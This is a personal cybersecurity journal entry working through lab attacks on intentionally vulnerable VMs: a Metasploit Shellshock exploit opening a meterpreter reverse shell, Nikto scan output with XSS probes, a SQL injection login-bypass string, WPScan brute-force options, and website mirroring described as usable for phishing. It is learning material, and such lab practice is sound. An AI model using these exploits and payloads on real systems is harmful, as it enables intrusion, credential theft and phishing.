My Cybersecurity Journal: August 2019

Injection attacks occur when an attacker is able to send commands through a web server to a backend system, bypassing normal security controls and fooling the backend system into believing that the request came from the web server. The most common form of this attack is the SQL injection attack, which exploits web applications to send unauthorized commands to a backend database server. Web applications often receive input from users and use it to compose a database query that provides results that are sent back to a user.

HTTrack

HTTrack allows users to copy or "mirror" websites from the Internet to a local computer. It can be downloaded as a standalone tool or download (and install) in Kali using the apt-get install command.

Open terminal in Kali > type apt-get install webhttrack > type y and press Enter to continue

After installation is done, type webhttrack > press Enter.

Choose a Language preference > click Next.

Type a New project name > click Next.

Type the Web Address or URL > click Next.

Try2hack.nl is a website that you can freely hack online and contains challenges or levels in breaking their website.

Leave the default setting > click Start.

Click Browse Mirrored Website

The web pages and files are saved under Home > websites > COPTRY2HACK > www.try2hack.nl

You can perform offline web server attacks (view the source code) or modify the website and use it for social engineering attacks (phishing scam).

Web Server (Apache) Attack

I used the Metaspoitable2 VM to act as a web (Apache) server and typed the echo commands in nano editor.

msfadmin@metasploitable:~$ cd /usr/lib/cgi-bin

msfadmin@metasploitable:/usr/lib/cgi-bin$ sudo nano web.sh

[sudo] password for msfadmin: <msfadmin>

Type the echo commands > once finished hit Ctrl-X to exit > press y.

Press Enter (or type a new file name).

Make the file as executable using chmod

msfadmin@metasploitable:/usr/lib/cgi-bin$ sudo chmod 755 web.sh

I made a test by opening a web browser on my Windows 10 machine and typed the URL 192.168.1.120/cgi-bin/web.sh

Enable the SQL database and launch Metasploit Framework console.

root@kali:~# service postgresql start

root@kali:~# msfconsole

[*] Starting the Metasploit Framework consOle...-

Metasploit Park, System Security Interface

Version 4.0.5, Alpha E

Ready...

> access security

access: PERMISSION DENIED.

> access security grid

access: PERMISSION DENIED.

> access main security grid

access: PERMISSION DENIED....and...

YOU DIDN'T SAY THE MAGIC WORD!

=[ metasploit v4.17.11-dev ]

+ -- --=[ 1807 exploits - 1028 auxiliary - 313 post ]

+ -- --=[ 539 payloads - 42 encoders - 10 nops ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

Set the options or parameters for the web server/Apache exploit or attack payload.

msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec

msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 192.168.1.110

LHOST => 192.168.1.110

msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOST 192.168.1.120

RHOST => 192.168.1.120

msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/web.sh

TARGETURI => /cgi-bin/web.sh

msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x86/meterpreter/reverse_tcp

payload => linux/x86/meterpreter/reverse_tcp

msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

Name Current Setting Required Description

---- --------------- -------- -----------

CMD_MAX_LENGTH 2048 yes CMD max line length

CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)

HEADER User-Agent yes HTTP header to use

METHOD GET yes HTTP method to use

Proxies no A proxy chain of format type:host:port[,type:host:port][...]

RHOST 192.168.1.120 yes The target address

RPATH /bin yes Target PATH for binaries used by the CmdStager

RPORT 80 yes The target port (TCP)

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL/TLS for outgoing connections

SSLCert no Path to a custom SSL certificate (default is randomly generated)

TARGETURI /cgi-bin/web.sh yes Path to CGI script

TIMEOUT 5 yes HTTP read response timeout (seconds)

URIPATH no The URI to use for this exploit (default is random)

VHOST no HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

LHOST 192.168.1.110 yes The listen address (an interface may be specified)

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Linux x86

Launch the Apache exploit to the remote target MSPLOIT VM (192.168.1.120).

msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 192.168.1.110:4444

[*] Command Stager progress - 100.46% done (1097/1092 bytes)

[*] Sending stage (861480 bytes) to 192.168.1.120

[*] Meterpreter session 1 opened (192.168.1.110:4444 -> 192.168.1.120:49667) at 2018-10-30 04:53:34 -0400

meterpreter > help

Core Commands

=============

Command Description

------- -----------

? Help menu

background Backgrounds the current session

bgkill Kills a background meterpreter script

bglist Lists running background scripts

bgrun Executes a meterpreter script as a background thread

channel Displays information or control active channels

close Closes a channel

disable_unicode_encoding Disables encoding of unicode strings

enable_unicode_encoding Enables encoding of unicode strings

exit Terminate the meterpreter session

get_timeouts Get the current session timeout values

guid Get the session GUID

help Help menu

info Displays information about a Post module

irb Drop into irb scripting mode

load Load one or more meterpreter extensions

machine_id Get the MSF ID of the machine attached to the session

migrate Migrate the server to another process

quit Terminate the meterpreter session

read Reads data from a channel

resource Run the commands stored in a file

run Executes a meterpreter script or Post module

sessions Quickly switch to another session

set_timeouts Set the current session timeout values

sleep Force Meterpreter to go quiet, then re-establish session.

transport Change the current transport mechanism

use Deprecated alias for "load"

uuid Get the UUID for the current session

write Writes data to a channel

Stdapi: File system Commands

============================

Command Description

------- -----------

cat Read the contents of a file to the screen

cd Change directory

checksum Retrieve the checksum of a file

cp Copy source to destination

dir List files (alias for ls)

download Download a file or directory

edit Edit a file

getlwd Print local working directory

getwd Print working directory

lcd Change local working directory

lls List local files

lpwd Print local working directory

ls List files

mkdir Make directory

mv Move source to destination

pwd Print working directory

rm Delete the specified file

rmdir Remove directory

upload Upload a file or directory

Stdapi: Networking Commands

===========================

Command Description

------- -----------

arp Display the host ARP cache

getproxy Display the current proxy configuration

ifconfig Display interfaces

ipconfig Display interfaces

netstat Display the network connections

portfwd Forward a local port to a remote service

resolve Resolve a set of host names on the target

route View and modify the routing table

Stdapi: System Commands

=======================

Command Description

------- -----------

execute Execute a command

getenv Get one or more environment variable values

getpid Get the current process identifier

getuid Get the user that the server is running as

kill Terminate a process

localtime Displays the target system's local date and time

pgrep Filter processes by name

pkill Terminate processes by name

ps List running processes

shell Drop into a system command shell

suspend Suspends or resumes a list of processes

sysinfo Gets information about the remote system, such as OS

Stdapi: Webcam Commands

=======================

Command Description

------- -----------

webcam_chat Start a video chat

webcam_list List webcams

webcam_snap Take a snapshot from the specified webcam

webcam_stream Play a video stream from the specified webcam

Stdapi: Mic Commands

====================

Command Description

------- -----------

listen listen to a saved audio recording via audio player

mic_list list all microphone interfaces

mic_start start capturing an audio stream from the target mic

mic_stop stop capturing audio

Stdapi: Audio Output Commands

=============================

Command Description

------- -----------

play play an audio file on target system, nothing written on disk

You can gather the machine's info using the shell commands available from the help option.

meterpreter > sysinfo

Computer : metasploitable.localdomain

OS : Ubuntu 8.04 (Linux 2.6.24-16-server)

Architecture : i686

BuildTuple : i486-linux-musl

Meterpreter : x86/linux

meterpreter > ifconfig

Interface 1

============

Name : lo

Hardware MAC : 00:00:00:00:00:00

MTU : 16436

Flags : UP,LOOPBACK

IPv4 Address : 127.0.0.1

IPv4 Netmask : 255.0.0.0

IPv6 Address : ::1

IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::

Interface 2

============

Name : eth0

Hardware MAC : 00:0c:29:fa:dd:2a

MTU : 1500

Flags : UP,BROADCAST,MULTICAST

IPv4 Address : 192.168.1.120

IPv4 Netmask : 255.255.255.0

IPv6 Address : fe80::20c:29ff:fefa:dd2a

IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > shell

Process 30362 created.

Channel 1 created.

pwd

/usr/lib/cgi-bin

php

php5

web.sh

Nikto

Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items such as dangerous files/programs, checks for outdated server versions. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.

root@kali:~# nikto

- Nikto v2.1.6

---------------------------------------------------------------------------

+ ERROR: No host specified

-config+ Use this config file

-Display+ Turn on/off display outputs

-dbcheck check database and other key files for syntax errors

-Format+ save file (-o) format

-Help Extended help information

-host+ target host

-id+ Host authentication to use, format is id:pass or id:pass:realm

-list-plugins List all available plugins

-output+ Write output to this file

-nossl Disables using SSL

-no404 Disables 404 checks

-Plugins+ List of plugins to run (default: ALL)

-port+ Port to use (default 80)

-root+ Prepend root value to all requests, format is /directory

-ssl Force ssl mode on port

-Tuning+ Scan tuning

-timeout+ Timeout for requests (default 10 seconds)

-update Update databases and plugins from CIRT.net

-Version Print plugin and database versions

-vhost+ Virtual host (for Host header)

+ requires a value

Note: This is the short help output. Use -H for full help text.

root@kali:~#

root@kali:~# nikto -host 192.168.1.120 // MSPLOIT2 VM

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP: 192.168.1.120

+ Target Hostname: 192.168.1.120

+ Target Port: 80

+ Start Time: 2018-11-05 22:32:52 (GMT-5)

---------------------------------------------------------------------------

+ Server: Apache/2.2.8 (Ubuntu) DAV/2

+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.

+ Uncommon header 'tcn' found, with contents: list

+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php

+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.

+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.

+ OSVDB-3268: /doc/: Directory indexing found.

+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.

+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.

+ Server leaks inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 92462, size: 40540, mtime: Tue Dec 9 12:24:00 2008

+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.

+ OSVDB-3268: /test/: Directory indexing found.

+ OSVDB-3092: /test/: This might be interesting...

+ /phpinfo.php: Output from the phpinfo() function was found.

+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.

+ OSVDB-3268: /icons/: Directory indexing found.

+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found.

+ /phpinfo.php?cx[]=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<script>alert(foo)</script>: Output from the phpinfo() function was found.

+ OSVDB-3233: /icons/README: Apache default file found.

+ /phpMyAdmin/: phpMyAdmin directory found

+ OSVDB-3092: /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.

+ 8347 requests: 0 error(s) and 29 item(s) reported on remote host

+ End Time: 2018-11-05 22:33:23 (GMT-5) (31 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested

OWASP Broken Web Application (BWA)

OWASP Broken Web Applications Project is a collection of vulnerable web applications that is distributed on a Virtual Machine.

Download and extract the OWASP Broken Web Application. Double-click on the VMWare configuration file (2 KB).

Right-click on the VM > Settings > Network Adapter > choose Custom: Specific virtual network > VMnet0

I renamed the VM to BWAPP. Click Power ON (green arrow icon). Type the login: root/owaspbwa (already displayed)

I changed the BWAPP VM IP address to 192.168.1.140/24 using the command: ifconfig eth0 192.168.1.140 netmask 255.255.255.0

I've HTTP to BWAPP from Windows 7 machine using the new IP address (192.168.1.140). Click on OWASP Mutillidae II

Hover to OWASP 2013 > A1 - Injection (SQL) > SQLi - Bypass Authentication > Login

To view hints or the steps in performing SQL Injection attacks, click Toggle Hints > Authentication Bypass.

Type Username ' 'a' = 'a' --

There's a "space" after --

Noticed the status became User Authenticated and there's a Logged In Admin called admin

WordPress Scan (WPScan)

WPScan is a free, for non-commercial use, black box WordPress vulnerability scanner written for security professionals and blog maintainers to test the security of their sites.

root@kali:~# wpscan

_______________________________________________________________

__ _______ _____

\ \ / / __ \ / ____|

\ \ /\ / /| |__) | (___ ___ __ _ _ __ Â®

\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

\ /\ / | | ____) | (__| (_| | | | |

\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team

Version 2.9.4

Sponsored by Sucuri - https://sucuri.net

@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_

_______________________________________________________________

Examples :

-Further help ...

wpscan --help

-Do 'non-intrusive' checks ...

wpscan --url www.example.com

-Do wordlist password brute force on enumerated users using 50 threads ...

wpscan --url www.example.com --wordlist darkc0de.lst --threads 50

-Do wordlist password brute force on the 'admin' username only ...

wpscan --url www.example.com --wordlist darkc0de.lst --username admin

-Enumerate installed plugins ...

wpscan --url www.example.com --enumerate p

-Enumerate installed themes ...

wpscan --url www.example.com --enumerate t

-Enumerate users (from 1 - 10)...

wpscan --url www.example.com --enumerate u

-Enumerate users (from 1 - 20)...

ruby wpscan --url www.example.com --enumerate u[1-20]

-Enumerate installed timthumbs ...

wpscan --url www.example.com --enumerate tt

-Use a HTTP proxy ...

wpscan --url www.example.com --proxy 127.0.0.1:8118

-Use a SOCKS5 proxy ... (cURL >= v7.21.7 needed)

wpscan --url www.example.com --proxy socks5://127.0.0.1:9000

-Use custom content directory ...

wpscan -u www.example.com --wp-content-dir custom-content

-Use custom plugins directory ...

wpscan -u www.example.com --wp-plugins-dir wp-content/custom-plugins

-Update the Database ...

wpscan --update

-Debug output ...

wpscan --url www.example.com --debug-output 2>debug.log

See README for further information.

[!] No argument supplied

root@kali:~# wpscan --url http://localhost --enumerate u

_______________________________________________________________

__ _______ _____

\ \ / / __ \ / ____|

\ \ /\ / /| |__) | (___ ___ __ _ _ __ Â®

\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

\ /\ / | | ____) | (__| (_| | | | |

\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team

Version 2.9.4

Sponsored by Sucuri - https://sucuri.net

@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_

_______________________________________________________________

[i] It seems like you have not updated the database for some time

[?] Do you want to update now? [Y]es [N]o [A]bort update, default: [N] > y

[i] Updating the Database ...

[i] Update completed

root@kali:~# wpscan --url http://localhost

_______________________________________________________________

__ _______ _____

\ \ / / __ \ / ____|

\ \ /\ / /| |__) | (___ ___ __ _ _ __ Â®

\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

\ /\ / | | ____) | (__| (_| | | | |

\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team

Version 2.9.4

Sponsored by Sucuri - https://sucuri.net

@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_

_______________________________________________________________

[!] The remote website is up, but does not seem to be running WordPress. If you are sure, use --force

root@kali:~# wpscan --url http://localhost --force --enumerate p

_______________________________________________________________

__ _______ _____

\ \ / / __ \ / ____|

\ \ /\ / /| |__) | (___ ___ __ _ _ __ Â®

\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

\ /\ / | | ____) | (__| (_| | | | |

\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team

Version 2.9.4

Sponsored by Sucuri - https://sucuri.net

@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_

_______________________________________________________________

[+] URL: http://localhost/

[+] Started: Mon Nov 5 21:30:26 2018

[+] Interesting header: SERVER: Apache/2.4.35 (Debian)

[!] Upload directory has directory listing enabled: http://localhost/wp-content/uploads/

[!] Includes directory has directory listing enabled: http://localhost/wp-includes/

[+] Enumerating WordPress version ...

[+] WordPress version 4.9.8 (Released on 2018-08-02) identified from advanced fingerprinting

[+] Enumerating installed plugins (only ones marked as popular) ...

Time: 00:00:01 <==================================> (1494 / 1494) 100.00% Time: 00:00:01

[+] We found 1 plugin:

[+] Name: akismet - v4.0.8

| Latest version: 4.0.8 (up to date)

| Last updated: 2018-10-30T16:34:00.000Z

| Location: http://localhost/wp-content/plugins/akismet/

| Readme: http://localhost/wp-content/plugins/akismet/readme.txt

[+] Finished: Mon Nov 5 21:30:32 2018

[+] Elapsed time: 00:00:06

[+] Requests made: 1558

[+] Memory used: 70.914 MB

My Cybersecurity Journal

Friday, August 16, 2019

Web Server and SQL Injection Attack, Nikto and Wordpress Scan